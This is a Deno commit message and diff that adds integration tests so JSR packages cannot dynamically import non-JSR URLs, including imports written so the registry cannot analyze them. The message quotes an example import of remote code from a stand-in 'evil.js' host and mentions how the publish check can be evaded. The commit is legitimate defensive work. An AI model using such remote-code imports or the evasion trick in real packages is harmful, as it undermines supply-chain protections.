fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.

1 files changed, 16 insertions, 0 deletions

diff --git a/tests/integration/jsr_tests.rs b/tests/integration/jsr_tests.rs
index fa8a9d8b9..25a0c8663 100644
--- a/tests/integration/jsr_tests.rs
+++ b/tests/integration/jsr_tests.rs
@@ -60,6 +60,22 @@ itest!(deps_info {
   http_server: true,
 });
 
+itest!(import_https_url_analyzable {
+  args: "run -A jsr/import_https_url/analyzable.ts",
+  output: "jsr/import_https_url/analyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
+itest!(import_https_url_unanalyzable {
+  args: "run -A jsr/import_https_url/unanalyzable.ts",
+  output: "jsr/import_https_url/unanalyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
 itest!(subset_type_graph {
   args: "check --all jsr/subset_type_graph/main.ts",
   output: "jsr/subset_type_graph/main.check.out",